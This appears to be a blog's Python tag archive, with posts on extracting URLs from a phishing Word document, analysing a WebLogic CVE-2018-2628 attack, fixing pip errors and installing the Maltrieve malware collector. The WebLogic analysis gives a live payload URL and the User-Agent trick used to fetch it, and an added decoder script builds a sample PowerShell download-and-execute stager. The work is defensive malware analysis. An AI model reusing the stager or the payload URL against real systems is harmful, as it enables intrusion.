Tag Archives: python

Analyzing Phishing Email – Word XML File Analysis

Recently I’ve observed a phishing mail as below:
https://www.virustotal.com/#/file/cf027dd938f1a268f45f2ea786dc538ab47f35006fb12d0b64e0867bccf789c0/detection – clean

The file seems to be clean per VT. Interestingly, in the Details section, there are 2 URLs listed under "OpenXML Doc Info".

To find these URLs yourself, first rename the Word document to a zip file, e.g. sample.doc to sample.zip. This works because the file is really an OpenXML (OOXML) container, a zip archive of XML parts, despite its .doc extension; a legacy binary .doc would not unzip.

Then extract the zip file. The URLs can be found inside the file document.xml.rels (~/sample_folder/word/_rels/):

It may look simple if you know which file to look at and where it is.

I was thinking: what if we could search for all the URLs/hyperlinks in the XML content of the Word document, without having to open the files one by one?

To do that, we'll use the zipdump and re-search Python scripts (together with reextra) by Didier Stevens:

  • zipdump
  • re-search
  • reextra

Download the Python scripts mentioned above into one place. Then execute the command below:

The command above searches the content of the zip file and applies a regex search for URLs to each part.
As you can see below, these are all the URLs contained in the Word doc:
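The same sweep in plain Python, as an added example that is not code from the post or from Didier Stevens' tools: it walks every XML/rels part of the OOXML zip, pulls the hyperlink relationship targets that Word stores in document.xml.rels, and regex-searches all parts for URLs while dropping the schema namespace URIs that every OOXML file contains. The document it builds is a constructed stand-in for the phishing sample; the example.invalid URLs are placeholders, not the real indicators.

```python
import io
import re
import xml.etree.ElementTree as ET
import zipfile

# Word stores hyperlink targets as relationships of this type in *.rels parts.
REL_NS = '{http://schemas.openxmlformats.org/package/2006/relationships}'
HYPERLINK_TYPE = ('http://schemas.openxmlformats.org/officeDocument/2006/'
                  'relationships/hyperlink')

# URL regex for a sweep over every XML part; stops at quotes, whitespace and
# angle brackets so it does not swallow the surrounding markup.
URL_RE = re.compile(rb'https?://[^\s"\'<>]+')

# Namespace/schema URIs present in every OOXML part; they are not indicators.
NOISE = ('schemas.openxmlformats.org', 'schemas.microsoft.com', 'www.w3.org',
         'purl.org')


def hyperlink_targets(doc_bytes):
    """External hyperlink targets declared in any *.rels part (word/_rels/...)."""
    targets = []
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith('.rels'):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(REL_NS + 'Relationship'):
                if (rel.get('Type') == HYPERLINK_TYPE
                        and rel.get('TargetMode') == 'External'):
                    targets.append(rel.get('Target'))
    return targets


def all_urls(doc_bytes):
    """Every non-schema URL in every XML/rels part, as sorted (part, url) pairs."""
    found = set()
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(('.xml', '.rels')):
                continue
            for match in URL_RE.finditer(zf.read(name)):
                url = match.group(0).decode('utf-8', 'replace')
                if not any(n in url for n in NOISE):
                    found.add((name, url))
    return sorted(found)


def build_sample_doc():
    """Constructed stand-in for the phishing document (not the real sample)."""
    rels = (
        b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        b'<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        b'<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.invalid/login.php?id=1" TargetMode="External"/>'
        b'<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
        b'</Relationships>')
    document = (
        b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        b'<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
        b'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
        b'<w:body><w:p><w:hyperlink r:id="rId1"><w:r><w:t>Click here</w:t></w:r></w:hyperlink></w:p>'
        b'<w:p><w:r><w:t>Visit https://example.invalid/verify now</w:t></w:r></w:p></w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as zf:
        zf.writestr('[Content_Types].xml',
                    b'<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr('word/document.xml', document)
        zf.writestr('word/_rels/document.xml.rels', rels)
    return buf.getvalue()


if __name__ == '__main__':
    import sys
    # Pass a .doc/.docx path to scan a real file; otherwise the constructed sample is used.
    data = open(sys.argv[1], 'rb').read() if len(sys.argv) > 1 else build_sample_doc()
    for target in hyperlink_targets(data):
        print('hyperlink:', target)
    for part, url in all_urls(data):
        print(f'{part}: {url}')
```

The relationship walk is the precise answer (it is exactly what the post found by hand in document.xml.rels); the regex sweep is the noisy safety net, catching URLs typed in body text, in comments, in VBA-free embedded XML, and anywhere else a rels-only check would miss. The two disagreeing is itself a signal worth a look.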

Analyzing Oracle WebLogic attack

Recently we received an alert from our WAF about an attack against our environment.
Further review of the alert found that the attacker was exploiting the Oracle WebLogic RCE deserialization vulnerability (CVE-2018-2628).

We observed that the attacker included some sort of PowerShell command in the request:

It seems the PowerShell command uses Base64 encoding for obfuscation.
I used https://gchq.github.io/CyberChef/ to decode the Base64:

It seems it tries to fetch the file DL.php from http://111.230.229.226/images/test/DL.php.
Let's try to grab that file:

Hmm... Error 404? Is it a real error,
or are we missing something here?

Let's analyze the command carefully:

We can see the attacker sets a specific User-Agent when fetching the file.
The server only hands out the payload to requests carrying that User-Agent and answers everything else with a 404; that is why a plain wget/curl of the URL failed. Gating the second stage on a header like this is a common way to keep crawlers, sandboxes and analysts from retrieving it.

So what we have to do is set exactly the same User-Agent when fetching the file.
In this case, I'm using curl to fetch the file:

Now see? Previously, fetching the file without the User-Agent failed with error 404.
Again, we see another set of Base64 encoding here.

But what is it?
I'm not expert enough to explain this, but TL;DR, it converts the Base64-encoded string to a memory stream and executes it. I guess ¯\_(ツ)_/¯

So, to see what happens if this command executes, we can use the Python script below to decode it.
With this script, we can basically see what those Base64 blobs are doing.

Take the Base64 from above and paste it into the encoded parameter, as in the example below:

Save the script and run it with the command below:

This will save all the output from your CMD to a text file for easier reading.
P/S: You can rename output_DL_php.txt to any filename you want.

Let's see what's inside the text file:

As you can see, the command is doing a bunch of stuff that I'm lazy to explain 😉
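The decoding done by hand above (CyberChef for the outer Base64, then the Python script for the inner blob), generalized into one script. This is an added example, not the post's script nor the referenced decrypt.py. It decodes the UTF-16LE Base64 that -EncodedCommand carries, then keeps decoding every Base64 blob it finds in each stage, unwrapping GzipStream/DeflateStream data when present. The two-layer stager it builds is constructed for the demo: the gzip wrapper inside the memory-stream one-liner, the 192.0.2.10 documentation address and the User-Agent string are assumptions about the shape of such payloads, not the contents of the real DL.php.

```python
import base64
import gzip
import re
import zlib

# Long Base64 runs: the payload blobs carried inside PowerShell one-liners.
B64_RE = re.compile(r'[A-Za-z0-9+/]{40,}={0,2}')
URL_RE = re.compile(r'https?://[^\s\'"()<>]+')


def bytes_to_text(raw):
    """Turn a decoded blob into script text: unwrap gzip/deflate streams,
    then detect UTF-16LE (what -EncodedCommand uses) or UTF-8."""
    if raw[:2] == b'\x1f\x8b':                                # GzipStream
        return bytes_to_text(gzip.decompress(raw))
    if len(raw) >= 4 and raw[1::2].count(0) > len(raw) // 4:  # UTF-16LE ASCII
        return raw.decode('utf-16-le', 'replace')
    try:
        text = raw.decode('utf-8')
        if all(c.isprintable() or c in '\r\n\t' for c in text):
            return text
    except UnicodeDecodeError:
        pass
    try:                                                      # DeflateStream
        return bytes_to_text(zlib.decompress(raw, -15))
    except zlib.error:
        return raw.decode('latin-1')                          # give up: raw bytes


def peel(script, max_depth=8):
    """Decode every Base64 blob in each stage until none is left.
    Returns the stages outermost first; the last one is the real payload."""
    stages = [script]
    for _ in range(max_depth):
        blobs = B64_RE.findall(stages[-1])
        if not blobs:
            break
        stages.append('\n'.join(bytes_to_text(base64.b64decode(b)) for b in blobs))
    return stages


def extract_iocs(text):
    """URLs in the final stage: the network indicators to block and hunt for."""
    return sorted(set(URL_RE.findall(text)))


def build_sample_command():
    """Constructed two-layer stager in the shape of the one in the post:
    -EncodedCommand (UTF-16LE Base64) wrapping a gzip MemoryStream blob.
    Address and User-Agent are placeholders, not the real indicators."""
    inner = ("$wc = New-Object System.Net.WebClient\n"
             "$wc.Headers.Add('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)')\n"
             "IEX $wc.DownloadString('http://192.0.2.10/images/test/DL.php')\n")
    gz_b64 = base64.b64encode(gzip.compress(inner.encode())).decode()
    middle = ("IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream("
              "[IO.MemoryStream][Convert]::FromBase64String('" + gz_b64 + "'),"
              "[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()")
    enc = base64.b64encode(middle.encode('utf-16-le')).decode()
    return 'powershell -nop -w hidden -EncodedCommand ' + enc, inner


if __name__ == '__main__':
    import sys
    # Pass a file holding the captured command line; otherwise the constructed sample runs.
    command = open(sys.argv[1]).read() if len(sys.argv) > 1 else build_sample_command()[0]
    stages = peel(command)
    for depth, stage in enumerate(stages):
        print(f'--- stage {depth} ---\n{stage}')
    print('IOCs:', extract_iocs(stages[-1]))
```

Redirect the output to a file as the post does if you prefer; the point of returning the stages rather than printing them is that the last stage can be fed straight into an IOC extractor or a detection test. Nothing here executes the PowerShell, so it is safe to run on an analysis box.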
Hope you enjoy reading this.

IOCs:

References:
https://gist.githubusercontent.com/strazzere/5faa709a3db9e1dcf3b5/raw/42b98a918bac3725934bcfa3087ac5936d9b88d1/decrypt.py
http://threat.tevora.com/5-minute-forensics-decoding-powershell-payloads/

Upgrade Python packages using pip

As the title says; to update your Python packages via pip:

for Linux/*nix:

p/s: you may need to run it with sudo. Probably.

for Windows:

Credit: http://stackoverflow.com/questions/2720014/upgrading-all-packages-with-pip
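The same task done from Python instead of a shell pipeline, as an added example that is not from the post or the credited Stack Overflow answer. It reads pip's JSON listing rather than cutting columns out of the human-readable table, and upgrades through `python -m pip` so that the interpreter whose packages you are inspecting is the one that gets upgraded (which also sidesteps the Windows problem of pip.exe being unable to replace itself while it runs). The JSON in the block is constructed sample output.

```python
import json
import subprocess
import sys

# Constructed sample of what `pip list --outdated --format=json` prints.
SAMPLE_OUTDATED = '''[
  {"name": "requests", "version": "2.18.4", "latest_version": "2.31.0", "latest_filetype": "wheel"},
  {"name": "urllib3", "version": "1.22", "latest_version": "2.0.7", "latest_filetype": "wheel"}
]'''


def outdated_from_json(json_text):
    """(name, installed, latest) for each entry in pip's JSON listing."""
    return [(p['name'], p['version'], p['latest_version'])
            for p in json.loads(json_text)]


def upgrade_command(names):
    """One `python -m pip install --upgrade` call for all names, bound to the
    interpreter running this script so the right site-packages is upgraded."""
    return [sys.executable, '-m', 'pip', 'install', '--upgrade', *names]


def upgrade_all(dry_run=True):
    """List outdated packages as JSON, then upgrade them in a single pip
    invocation. Returns the command so a dry run shows what would happen."""
    listing = subprocess.run(
        [sys.executable, '-m', 'pip', 'list', '--outdated', '--format=json'],
        check=True, capture_output=True, text=True).stdout
    names = [name for name, _, _ in outdated_from_json(listing)]
    cmd = upgrade_command(names)
    if names and not dry_run:
        subprocess.run(cmd, check=True)
    return cmd


if __name__ == '__main__':
    for name, installed, latest in outdated_from_json(SAMPLE_OUTDATED):
        print(f'{name}: {installed} -> {latest}')
    # Dry run by default; pass --yes to actually upgrade.
    print(' '.join(upgrade_all(dry_run='--yes' not in sys.argv)))
```

Two caveats the one-liners in the credited answer share: a blanket upgrade of system-wide packages (the sudo case) can break distro tooling that pins specific versions, so prefer a virtualenv or `--user`; and editable (`-e`) installs show up in the listing too, so filter them out if you do not want them touched.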

Python Error – InsecurePlatformWarning

One time I saw this kind of error:

The warning comes from urllib3 on Python versions (before 2.7.9) whose ssl module has no real SSLContext, so SNI and proper certificate checking are not available to it.

If you're on Ubuntu, you may run into trouble installing pyOpenSSL; you'll need these dependencies:

You only need to install the security extras of requests (requests[security]), which pull in pyOpenSSL, ndg-httpsclient and pyasn1:

or install them directly:

Requests will then automatically inject pyOpenSSL into urllib3.

Credit: http://stackoverflow.com/questions/29134512/insecureplatformwarning-a-true-sslcontext-object-is-not-available-this-prevent
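An added diagnostic, not from the post or the credited answer, for deciding whether an interpreter is in the situation that produces this warning: the ssl module lacks a real SSLContext and the pyOpenSSL stack named above is not installed to stand in for it. It also attempts the injection that requests performs when the extras are present. The conditions approximate urllib3's internal checks rather than reproducing them line for line.

```python
import importlib.util
import ssl
import sys

# The three packages pulled in by requests[security] in the credited answer.
SECURITY_EXTRAS = ('OpenSSL', 'ndg.httpsclient', 'pyasn1')


def installed(module_name):
    """True if the module can be found without importing it."""
    try:
        return importlib.util.find_spec(module_name) is not None
    except (ImportError, ValueError, AttributeError):  # missing parent package etc.
        return False


def platform_report():
    """The facts about this interpreter that urllib3/requests care about."""
    return {
        'python': sys.version_info[:3],
        'openssl': ssl.OPENSSL_VERSION,
        'has_sslcontext': hasattr(ssl, 'SSLContext'),
        'has_sni': bool(getattr(ssl, 'HAS_SNI', False)),
        'pyopenssl_stack': all(installed(m) for m in SECURITY_EXTRAS),
    }


def needs_security_extras(report):
    """InsecurePlatformWarning territory: no real SSLContext (Python < 2.7.9)
    and nothing installed that would let requests route TLS through pyOpenSSL."""
    return not report['has_sslcontext'] and not report['pyopenssl_stack']


def inject_pyopenssl():
    """What requests does when the extras are present: swap urllib3's TLS
    layer for pyOpenSSL. Returns True if the injection succeeded here."""
    try:
        from urllib3.contrib import pyopenssl
        pyopenssl.inject_into_urllib3()
        return True
    except Exception:  # urllib3 or pyOpenSSL absent, or injection unsupported
        return False


if __name__ == '__main__':
    report = platform_report()
    for key, value in report.items():
        print(f'{key}: {value}')
    if needs_security_extras(report):
        print('-> install requests[security] (or pyOpenSSL, ndg-httpsclient, pyasn1)')
    else:
        print('-> platform is fine; pyOpenSSL injection:', inject_pyopenssl())
```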

Python Error – ImportError: No module named pkg_resources

One time I tried to install some Python packages via pip install from a requirements file, but I encountered an error like this:

To fix the issue, run the setup script for setuptools (pkg_resources is part of setuptools, so the error means setuptools is missing or broken):

Yeah, it solved my problem. Probably. XD

Credit: http://stackoverflow.com/questions/7446187/no-module-named-pkg-resources

Installing pymongo on Ubuntu

The PyMongo distribution contains tools for interacting with a MongoDB database from Python.

Maltrieve on Mac OS X

Maltrieve originated as a fork of mwcrawler. It retrieves malware directly from the sources listed at a number of sites, including:

  • Malc0de
  • Malware Black List
  • Malware Domain List
  • VX Vault
  • URLquery
  • CleanMX

If you want to install Maltrieve on your Mac OS X, below are the steps to install it.

  • First, install beautifulsoup4 via pip

  • Install the required dependencies (on OS X itself there is no apt-get; Homebrew or pip provide the equivalents)

  • Download maltrieve from GitHub

Done. Now you can use Maltrieve on your Mac OS X.

Install pip on Ubuntu 12.04

Install pip and virtualenv for Ubuntu 10.10 Maverick and newer

sudo apt-get install python-pip python-dev build-essential
sudo pip install --upgrade pip
sudo pip install --upgrade virtualenv

For older versions of Ubuntu
Install Easy Install

sudo apt-get install python-setuptools python-dev build-essential

Install pip

sudo easy_install pip

Install virtualenv

sudo pip install --upgrade virtualenv

I advise you to reboot your server after installing the python-pip package, before running the pip commands.